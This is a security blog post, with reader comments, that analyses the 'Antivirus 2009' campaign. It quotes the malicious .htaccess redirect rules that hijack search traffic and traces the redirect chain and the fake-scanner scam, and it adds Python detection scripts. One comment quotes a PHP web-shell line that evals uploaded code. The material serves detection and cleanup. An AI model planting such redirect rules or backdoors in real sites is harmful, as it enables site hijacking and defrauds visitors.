
Unmasking the Antivirus 2009 .htaccess Exploit.

   08 Dec 08   Filed in Website exploits

In the previous post I described the symptoms of the Antivirus 2009 .htaccess exploit, how to detect it and get rid of it.

This time I’m going to further unmask this exploit and show how it works.

The purpose of the exploit.

This is a multi-stage campaign that combines web site hacking with social engineering. Its purpose is to get as many Windows users as possible to install a trojan disguised as “Antivirus 2009” security software, and then to use fake security warnings to swindle money out of gullible people.

Stage 1. Hijacking search traffic.

To drive visitors to their web sites, the rogues have hacked (I suspect) thousands of legitimate web sites and made them silently redirect search engine traffic to Antivirus 2009 landing pages.

This exploit adds conditional redirects to the .htaccess files of the compromised web sites.

.htaccess is a directory-level configuration file of the most widely used web server, Apache. It works even in shared hosting environments, which makes it a very likely target of attacks. Few site owners know these files exist (the leading dot hides them in most file listings) or what they are for, and even fewer know how to read the directives in them. So any changes to .htaccess may remain unnoticed.

This is the malicious code:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87 .248.180.90/in.html?s=ipw2 [R,L]

As you can see, these rules check the referer (the page the visitor came from) and, if it looks like one of the major search engines (Google, AOL, MSN, AltaVista, Ask, Yahoo), redirect the visitor to the hackers’ intermediary page. Note how loose the matching is: the [NC] flag makes it case-insensitive, the patterns are effectively substring matches, and because every condition but the last carries the [OR] flag a single match is enough, so any referer that merely contains “ask” or “msn” somewhere triggers the redirect. The [R,L] flags on the RewriteRule make it an external redirect (302 by default) and stop further rule processing. The IP address of the intermediary page may differ (I also saw IPs in the 89.28.13.200-5 range).

To hide this code from anyone who does open the file, the hackers usually precede it with a couple of screens of blank lines.

  • This little trick of redirecting only search traffic may remain unnoticed by site owners for a pretty long time, because they very rarely click on search engine results to visit their own sites. Only regular analysis of traffic stats, or security scanners like Unmask Parasites, can help them detect this exploit at an early stage. (You can read about the symptoms and the detection of this exploit in the previous post.)
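The following script is an added example, not code from the original post. It parses an .htaccess body (a constructed sample below reproduces the injected block, with the attackers’ IP replaced by the placeholder host attacker.example and padded with the blank lines just described), emulates how mod_rewrite combines [NC] and [OR]-flagged conditions, and flags any referer-conditional RewriteRule that sends visitors to a host that is not your own. It goes slightly beyond the post in that it handles any number of condition groups, not only this one.

```python
import re

# Constructed sample of an infected .htaccess: the block quoted in the post,
# with the attackers' IP replaced by the placeholder attacker.example and
# preceded by the screens of blank lines used to push it out of view.
SAMPLE_HTACCESS = "\n" * 60 + """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://attacker.example/in.html?s=ipw2 [R,L]
"""


def _flags(parts):
    """Flags of a directive, e.g. '[NC,OR]' -> ['NC', 'OR'] (empty if none)."""
    return parts[3].strip("[]").upper().split(",") if len(parts) > 3 else []


def parse_rules(text):
    """Parse the subset of mod_rewrite this exploit uses.

    Returns (leading_blank_lines, groups). Each group is
    (conditions, rule_pattern, rule_target, rule_flags); each condition is
    (regex, nocase, or_with_next). Conditions accumulate until the next
    RewriteRule, which is how mod_rewrite scopes them.
    """
    lines = text.splitlines()
    leading_blank = 0
    for line in lines:
        if line.strip():
            break
        leading_blank += 1

    groups, conds = [], []
    for line in lines:
        parts = line.split()
        if len(parts) >= 3 and parts[0] == "RewriteCond" and parts[1] == "%{HTTP_REFERER}":
            f = _flags(parts)
            conds.append((parts[2], "NC" in f, "OR" in f))
        elif len(parts) >= 3 and parts[0] == "RewriteRule":
            groups.append((conds, parts[1], parts[2], _flags(parts)))
            conds = []
    return leading_blank, groups


def _conditions_hold(conds, referer):
    """mod_rewrite semantics: conditions are AND-ed, except that a condition
    carrying [OR] is OR-ed with the one after it. Regexes are unanchored
    searches; [NC] makes them case-insensitive."""
    clusters, current = [], []
    for cond in conds:
        current.append(cond)
        if not cond[2]:            # no [OR]: this OR-cluster is complete
            clusters.append(current)
            current = []
    if current:                    # trailing [OR] with nothing after it
        clusters.append(current)

    def hit(cond):
        regex, nocase, _ = cond
        return re.search(regex, referer, re.IGNORECASE if nocase else 0) is not None

    return all(any(hit(c) for c in cluster) for cluster in clusters)


def redirect_target(groups, referer, path="index.html"):
    """URL a request for `path` with this Referer is sent to, or None.
    Like the [L] flag, the first matching rule ends processing."""
    for conds, pattern, target, _flags_ in groups:
        if re.search(pattern, path) and _conditions_hold(conds, referer or ""):
            return target
    return None


def suspicious_redirects(text, own_hosts):
    """(leading_blank_lines, [(foreign_host, n_conditions), ...]) for every
    referer-conditional rule whose target host is not in own_hosts."""
    leading_blank, groups = parse_rules(text)
    findings = []
    for conds, _pattern, target, _flags_ in groups:
        m = re.match(r"https?://([^/?#]+)", target, re.IGNORECASE)
        if conds and m and m.group(1).lower() not in own_hosts:
            findings.append((m.group(1), len(conds)))
    return leading_blank, findings


if __name__ == "__main__":
    blank, hits = suspicious_redirects(SAMPLE_HTACCESS, {"www.example.com"})
    print(f"{blank} blank lines before the first directive; foreign targets: {hits}")
    _, groups = parse_rules(SAMPLE_HTACCESS)
    for ref in ("http://www.google.com/search?q=x", "http://www.mytaskmanager.example/", None):
        print(repr(ref), "->", redirect_target(groups, ref))
```

Run it against a real file with `suspicious_redirects(open('.htaccess').read(), {'www.yoursite.com'})`; a large blank-line count combined with a foreign redirect host is exactly the signature described above.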

Stage 2. Chain of redirects.

When you check an infected site with Unmask Parasites, you can see a chain of four redirects:

302 -> http://89.28.13 .204/in.html?s=xx
302 -> http://wwwinfoclick .com/soft.php?aid=0865&d=1&product=XPA&refer=ff94bbac7
302 -> http://defense-live-scan .com/2009/1/freescan.php?nu=880865
302 -> http://defense-live-scan .com/2009/1/en/freescan.php?id=880865

The first redirect (from the compromised .htaccess file) goes to a server in Moldova (IPs 89.28.13 .200-5 and 87.248.180 .90). Update: sometimes the first redirect uses the following URL instead: “maseo .ru/h .php”

That server redirects to one of the following domains:

  • wwwinfoclick .com
  • privatewebsphere .com
  • clicksoverview .com
  • proweb-info .com
  • secured-web-space .com
  • trustedliveclicks .com

Update (January 16, 2009)

  • internetsecuredweb .com
  • securedwebsolutions .com
  • worldgreenpeace .cn
  • getluckytoday .cn
  • surfingsnight .cn
  • premiuminterestscompany .cn
  • supermannews .cn (Created: 2009-01-09)

Those servers, in turn, redirect to a rogue landing page living on one of the following sites (the list may be incomplete):

  • defense-live-scan .com
  • antivirus-protectionscan .com
  • antivirusdefense .com
  • computerquickscanner .com
  • pro-scanner-online .com
  • antivirus-bestscan .com
  • pcantivirusscan .com
  • anti-virus-live-scanner .com
  • computerfastscanner .com
  • anti-virusproscan .com
  • protectionlive-scan .com
  • anti-virus-online-protection .com
  • antivirus-online-protection .com
  • advanced-scanner .com

Update (January 16, 2009)

  • bestantivirusproscan .com
  • best-antivirus-pro-scanner .com
  • bestantivirusdefence .com
  • professional-virus-scan .com
  • rapidantiviruspcscanner .com (Created: 2009-01-10)
  • premium-advanced-scan .com
  • premiumantivirusscan .com (Created: 2009-01-03)

I’m not sure about the details of this evil scheme, but I think it works like this:

The hacker-controlled servers in Moldova are used to load-balance the traffic (Alexa reports that some of the sites were in the Top 500 during the busiest week).

The next level (hosted by “Innovation It Solutions Corp” in the UK) checks which landing servers are currently available and redirects to them.

The last-level sites host the landing pages and have antivirus-related domain names. They are the ones web surfers see and report as malicious, which is why most of them are already defunct. At the time of writing (December 8) I can see only three live last-level domains (antivirus-online-protection .com, anti-virus-online-protection .com, and advanced-scanner .com), registered on December 4 and 5.

By the way, most of these domains were registered through the BIZCN.COM, INC. registrar during the last couple of weeks by the same “private person”, who holds several thousand other domain names.

It’s time to shut down the first two levels of this redirect scheme. Otherwise they’ll keep registering new domains every day and this scam can go on for a pretty long time.
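As an added example (not part of the original post), here is how the chain above can be walked one hop at a time without letting the client auto-follow, the way you would when documenting an infection for an abuse report. The HTTP client is a constructed stub that reproduces the four-hop shape quoted above with placeholder hosts (victim.example, tier1.example, tier2.example and landing.example are assumptions standing in for the Moldovan IP, the UK-hosted middle tier and a rogue landing domain); swap in a real HEAD request, or compare with `curl -sI -e 'http://www.google.com/' URL` hop by hop, to run it against a live site.

```python
from urllib.parse import urljoin, urlsplit

REDIRECT_STATUSES = {301, 302, 303, 307, 308}

# Constructed stand-in for the servers in the chain. Hosts are placeholders
# (assumption): victim.example is the compromised site, tier1/tier2.example
# the two intermediary levels, landing.example the rogue scanner page.
CHAIN = {
    "http://victim.example/": "http://tier1.example/in.html?s=xx",
    "http://tier1.example/in.html?s=xx":
        "http://tier2.example/soft.php?aid=0865&d=1&product=XPA",
    "http://tier2.example/soft.php?aid=0865&d=1&product=XPA":
        "http://landing.example/2009/1/freescan.php?nu=880865",
    # a relative Location, to show that the follower resolves it correctly
    "http://landing.example/2009/1/freescan.php?nu=880865":
        "/2009/1/en/freescan.php?id=880865",
}


def fake_fetch(url, referer=None):
    """Answer like a HEAD request would: (status, Location header or None).
    The compromised site only redirects search-engine visitors, exactly as
    the .htaccess rules do; the attackers' own servers redirect everyone."""
    if url == "http://victim.example/" and not (referer and "google" in referer.lower()):
        return 200, None            # direct visitors get the real page
    if url in CHAIN:
        return 302, CHAIN[url]
    return 200, None


def follow_chain(start, fetch, referer=None, max_hops=10):
    """Walk a redirect chain one hop at a time and return (hops, reason).

    hops is the list of (status, url) pairs actually requested; reason is
    "done" (a non-redirect answer), "loop" (a URL repeated) or "max_hops".
    Unlike a browser this never hangs on a looping or endless chain, and it
    records every intermediate URL instead of only the final one.
    """
    hops, seen, url = [], set(), start
    while True:
        if url in seen:
            return hops, "loop"
        seen.add(url)
        status, location = fetch(url, referer)
        hops.append((status, url))
        if status not in REDIRECT_STATUSES or not location:
            return hops, "done"
        if len(hops) >= max_hops:
            return hops, "max_hops"
        url = urljoin(url, location)   # Location may be relative


def hosts_in_chain(hops):
    """Distinct hosts in order of appearance: the summary for an abuse
    report (the first host after your own is the load balancer tier)."""
    out = []
    for _status, url in hops:
        host = urlsplit(url).hostname
        if host not in out:
            out.append(host)
    return out


if __name__ == "__main__":
    hops, reason = follow_chain("http://victim.example/", fake_fetch,
                                referer="http://www.google.com/search?q=test")
    for status, url in hops:
        print(status, "->", url)
    print(reason, hosts_in_chain(hops))
```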

Stage 3. The landing page and the bogus online scan.

Here comes the “social engineering” part of the scam.

Social engineering is the art of manipulating people into performing actions or divulging confidential information.

Warning: Don’t try this on Windows. To minimize the risk of infection I took the screenshots on my Linux machine.

The landing page contains JavaScript code that plays out the following scenario:

1. The browser window is shrunk to a very small size so that you can’t see the address of the current page. This also makes you think that something’s wrong with your system.

2. At the same time the following hardcoded warning is being displayed

Antivirus 2009. Warning.

3. If you believe this bogus warning and click “OK”, the site kindly informs you that Antivirus 2009 will scan your system and that you’ll need to install the “digitally signed and independently certified” software when prompted.

Antivirus 2009 will scan your system

4. If you choose to ignore the first warning and click “Cancel”, the site will also ignore your choice and redirect you to the same online scan page as if you’ve clicked “OK”.

5. Now that you know your system is about to be scanned by Antivirus 2009, the browser window is restored to its original size and you see a page that immediately starts to simulate the scan: a progress bar, changing filenames, a constantly increasing number of “errors found”. Everything is hardcoded and has nothing to do with scanning; it’s just an animation. For extra credibility this “scanner” mimics Microsoft’s visual style.

Antivirus 2009 fake scanner.

6. A few seconds later, when the “scan” is finished, you see the following report (it looks especially funny on Macs and Linux machines). Oh no! Dangerous spyware has been detected! And the names of the found spyware are so nasty that you definitely want to remove them ASAP: IEMonster, Zlob.PornAdvertizer, Trojan.InfoStealer.Banker.

Antivirus 2009 fake report

7. A quick look at the source of the page reveals that this report is just a hardcoded image with two mouse-click actions. If you click anywhere on the “report window” (even on the fake “Ignore” button), you’ll be prompted to install an .exe file. Don’t! The name of the file changes almost every day. Some known names are A9installer_880865.exe, InsatallAVv_880147.exe and InstallAVg_880147.exe. The file sizes also vary (to make detection harder), but they are usually less than 150 KB.

Download Antivirus 2009

8. If you clicked on the red “X” button of the report you’ll be advised not to close the window if “your want you” PC to be clean. Clicking “OK” will display the file download window.

Don't close this window

9. Clicking “Cancel” will display the final warning about harmful malware and the need to download and install Antivirus 2009. No options available now. Only the “OK” button that will start the file downloading.

Harmful and malicious software detected.

As you can see, every single path leads to the same end: the download and install window. You are lucky if you are on Linux or Mac, or if your browser is not configured to automatically start downloads and open downloaded files; in that case you can cancel the download. Otherwise this trojan will be installed on your computer.

Trojan detection

Because of the constantly changing nature of this trojan, most major (real) antivirus packages don’t recognize Antivirus 2009 files as a threat. I submitted several av2009 files to VirusTotal over the last couple of weeks, and the best result was today (December 8): 5 of 38 scanners flagged the file as suspicious.

VirusTotal Results
VirusTotal Results. By scanner.
Note that the most popular antivirus products (Symantec, McAfee, Kaspersky, Avast, AVG) never detected this trojan. No wonder there are so many infected computers. On the other hand, Microsoft’s own scanner always detected this fake antivirus.

Summary

This is an experimental series of articles about the Antivirus 2009 .htaccess exploit, as I’m still trying to find the right format for posts on this blog. Although this second post may look like one of Dancho Danchev‘s malware campaign dissections, I hope I made it useful for regular web site owners.
In conclusion, I’d like to highlight some key points:
  • No site is too small for hackers if they can make it part of their campaign.
  • Not seeing anything suspicious doesn’t mean your site is secure.
  • Web sites consist of more than HTML pages and databases. Learn about your web server’s configuration. If you are on Apache, be sure to protect your .htaccess files.
  • If you don’t want to lose your search engine traffic, take web site security seriously.
Thanks for reading.

Reader's Comments (16)

  1. |

    This is a very nice explanation of the exploit and its effects. Great work, and keep posting!

  2. |

    [...] use UseShots Editor myself (here is a couple of my latest blog posts created with UseShots Editor: 1, [...]

  3. |

    [...] “redirect, nu=880865” (terminatia paginii catre care eram redirectionat) si am dat de un site in care se scria despre problema ce afecteaza, se pare, mii de [...]

  4. |

    Thanks! That article helped me solve my problem. I replaced the code with RewriteEngine On . Is it enough?
    Thanks again!

    • |

      Disabling the RewriteEngine will help until hackers modify/replace your .htaccess file next time.

      The better solution would be remove the malicious code from the .htaccess file and make it write-protected.

      Make sure to check the rest of the instructions

  5. |

    Off (not On)

  6. |

    Thanks a lot! My friend’s website was hacked with this. Interestingly, his .htaccess file was already protected (644) so the only other possibilities are that his (shared) hosting service was hacked, or, his password was hacked (it was ‘moderately strong’ – Upper case, lower case, numbers, etc – though the letters were dictionary entries (similar to Bird54bird – would that be easily hacked?)

    Every directory in the site had a .htaccess.mal file, which seemed to be a copy of the bad .htaccess file, ready to be copied back perhaps.

    • |

      I have more and more evidence that this has to do with compromised passwords.
      What FTP program did your friend use? Did he store the password in it or typed it in on every login?
      Is he on Mac or PC or Linux?

  7. |

    To avoid clutter, I will be adding new domain names of redirect sites and bogus Antivirus sites in this comment.

    softwarforgoodusers .cn
    frenchfriestaste .cn
    tourinternetgide .cn
    latenightclick .cn
    profileduser .cn
    browserpower .cn
    fulldeposite .cn
    hollywoodstarsnow .cn
    securityadvertisement .cn
    intendyoseeyou .cn
    softwaretripsgoeshere .cn
    discostylepromo .cn
    someonestrails .cn
    refereruser .cn
    orderyourdream .cn
    gonesurfing .cn
    worldwidesphere .cn
    getluckywebpagepromo .cn
    activeusersearch .cn
    styleout .cn
    goingdignity .cn
    wintertimessport .cn
    lostdomains .cn
    toplevelawards .cn
    hairstylezone .cn
    bestgossips .cn
    perfectclicks .cn
    greatwallnitro .cn
    controlledsurfaces .cn
    pleasentsurfing .cn
    saturationpower .cn
    fordgreatcars .cn
    teafuntrip .cn
    getveryluckytoday .cn
    prideandglorynow .cn
    worldcommercialbusiness .cn
    constructorwebspace .cn
    alaskatoursonline .cn
    softwareoverworld .cn
    tabletpccomputing .cn
    securedradiostation .cn

    high-protection .info

    computerantiviruslivescanner .com
    rapidantivirusonlinescan .com
    pro-antispyware-scanner .com
    premium-antivirus-scan .com
    premiumonlinescanner .com
    bestanti-virusscan .com
    fast-antispyware-scan .com
    fastantispywarescanner .com
    fast-antivirus-pro-scan .com
    antispywareonlinescanner .com
    antispywareprolivescan .com
    antispywareliveproscan .com
    antispywareprolivescanner .com
    antispywareinternetproscan .com
    antispyware-internet-scan .com
    antispyware-premium-scan .com
    antispyware-live-pro-scan .com
    antispyware-online-scan .com
    bestantispywarescan .com
    bestantispywarelivescan .com
    computerantivirusscanner .com
    computerantivirusproscan .com
    antimalware-pro-scanner .com
    anti-malware-pro-scanner .com
    anti-malware-pro-scan .com
    antimalware-live-scanner .com
    antimalwareliveproscanner .com
    antimalwareliveproscanner .com
    antimalwareliveproscan .com
    antimalware-online-scanner .com
    premiumantiviruscheck .com
    antimalwaresuperscanner .com
    onlineantivirusproscan .com
    bestantimalwaredefence .com
    liteantispywareproscanner .com
    liteantimalwarescanner .com
    lite-anti-virus-scan .com
    liveantimalwarescan .com
    liveantimalwarefastscnan .com
    pro-antimalware-scanner .com
    fastantimalwareproscanner .com
    best-antimalware-pro-scan .com
    bestantimalwarelivescanner .com

  8. |

    We’ve seen this type of attack here at work as well. Please see my comment (once moderated) on http://blog.unmaskparasites.com/2009/01/14/gogo2me-hidden-iframe-injection/

    the root cause is the same, hijacked ftp accounts.

  9. |

    Hi,

    Thank you very much for this information. My website was leading to a malious site when it is searched on Yahoo / Google etc., but it worked fine if we type the name in the address bar. I was totally confused and after reading your article i found that there was an .htaccess exactly as mentioned above that redirects all my search engine traffic to 87 .248.180.90

    Now that i removed that entry, my website is back to normal on the search engines.

    Thanks again for this article.

    Regards,
    Aravind. C

  10. |

    Thanks a lot for this great article! and keep writing!

    Regards,
    Anand

  11. |

    Hi, the same thing happend to our website.
    After a lot of searching we discovered the .htaccess and a rewrite to a fake blog on my server that had a javascript redirect to http:// scanpcsecurity . com

    The first time it happened I changed all the passwords, deactivated ssh access and disabled all ftp users.

    I am a Mac user and I stored the new password as text in my ftp application Cyberduck.

    I am still trying to figure out how it happened.

  12. |

    Hi again,

    Just found out a new thing. Looking at my Status and Errors Report I find that somebody tried to access this file ( beta/img/.svn/tmp/ugatef.php ) 4 times.

    I look at the Date Over Time report of that file and I see that it is 4 times the same day.

    I download all the logs from that day and search for the file ugatef.php.

    After the 4 attempts I see that somebody accessed another file that shouldn’t be in my structure ( /newsletter/content/aceheg.php ).

    In this file I find PHP code with these lines:

    (…)

    if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code);

    (…)

    If I understand correctly, from here a malicious user can execute PHP code sent as a POST from a remote HTML form.

    Contact me if you want more info.

    Thanks,
    alx
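As an added example, not part of alx’s comment or of the original post: a small scanner for the two traces described in that comment, an md5-gated PHP backdoor that evals an uploaded file, and the access-log hits that led to it. The PHP files and log lines below are constructed samples (the password hash is a placeholder, the IPs are documentation addresses); the indicator patterns are my own heuristics, not anything the post or the commenter provides.

```python
import re

# Constructed sample web tree. aceheg.php mirrors the shape of the backdoor
# quoted in the comment above (hash replaced by a placeholder); ugatef.php
# sits where no PHP script should ever be; index.php is benign.
SAMPLE_FILES = {
    "newsletter/content/aceheg.php": (
        '<?php\n'
        'if (md5($_POST["p"])=="d41d8cd98f00b204e9800998ecf8427e"){\n'
        '  if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),'
        '$HTTP_POST_FILES["f"]["size"])){ eval($code); }\n'
        '}\n'
    ),
    "beta/img/.svn/tmp/ugatef.php": "<?php /* dropped here by the attacker */\n",
    "index.php": '<?php include "lib/db.php"; echo render_page($_GET["page"]);\n',
}

# Constructed access-log lines in Apache "combined" format.
LOG_LINES = """\
203.0.113.7 - - [12/Jan/2009:03:14:01 +0000] "POST /beta/img/.svn/tmp/ugatef.php HTTP/1.1" 404 512 "-" "Mozilla/4.0"
203.0.113.7 - - [12/Jan/2009:03:14:05 +0000] "POST /newsletter/content/aceheg.php HTTP/1.1" 200 27 "-" "Mozilla/4.0"
198.51.100.4 - - [12/Jan/2009:03:15:00 +0000] "GET /index.php HTTP/1.1" 200 4501 "http://www.google.com/search?q=x" "Mozilla/5.0"
"""

# Heuristic indicators (my own, not from the post). A hit means "look at
# this by hand", not "this is definitely a backdoor".
REQUEST_INPUT = re.compile(r"\$(?:_POST|_GET|_REQUEST|_COOKIE|_FILES|HTTP_POST_FILES)\b")
EVAL_CALL = re.compile(r"\b(?:eval|assert|create_function)\s*\(")
MD5_GATE = re.compile(
    r'md5\s*\(\s*\$(?:_POST|_GET|_REQUEST|_COOKIE)\s*\[[^\]]+\]\s*\)\s*={2,3}\s*["\'][0-9a-f]{32}["\']',
    re.IGNORECASE)
UPLOAD_READ = re.compile(r'\$(?:_FILES|HTTP_POST_FILES)\s*\[[^\]]+\]\s*\[\s*["\']tmp_name["\']\s*\]')
ODD_DIR = re.compile(r"(?:^|/)(?:\.svn|\.git|tmp|cache)/")


def scan_php(files):
    """{path: [indicator, ...]} for every file worth a manual look."""
    findings = {}
    for path, text in files.items():
        hits = []
        if ODD_DIR.search(path):
            hits.append("php script inside a VCS or temp directory")
        if EVAL_CALL.search(text) and REQUEST_INPUT.search(text):
            hits.append("eval of request input")
        if MD5_GATE.search(text):
            hits.append("md5-gated password check")
        if UPLOAD_READ.search(text):
            hits.append("reads an uploaded file")
        if hits:
            findings[path] = hits
    return findings


LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def suspicious_requests(log_text, flagged_paths):
    """(ip, method, path, status) for requests that touched a flagged script
    or anything under .svn/. The IPs are the pivot for the rest of the log."""
    flagged = {"/" + p.lstrip("/") for p in flagged_paths}
    out = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m.groups()
        bare = path.split("?", 1)[0]
        if bare in flagged or "/.svn/" in bare:
            out.append((ip, method, bare, int(status)))
    return out


if __name__ == "__main__":
    found = scan_php(SAMPLE_FILES)
    for path, hits in found.items():
        print(path, "->", ", ".join(hits))
    for req in suspicious_requests(LOG_LINES, found):
        print(*req)
```

On a real site, feed `scan_php` a dict built by walking the web root for `*.php` files, and grep the logs for every IP the second function returns: the same client is usually the one that later rewrites .htaccess.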

  13. |

    I would recommend anyone who thinks they may be infected with the viruses this spreads to do a complete OS re-install. This is the most thorough way of cleaning infections from your system, because some of these bugs really burrow deep into the code.

  14. |

    Do you know of anyway with htaccess to disable someone from using your domain to point to their own website on the same server? Ex: they use YOURDOMAIN.com to promote their PHISHING WEBSITE.COM by using this simple URL to send users : YOURDOMAIN.COM/~phishing/file.html

    Any help would be greatly appreciated. Thanks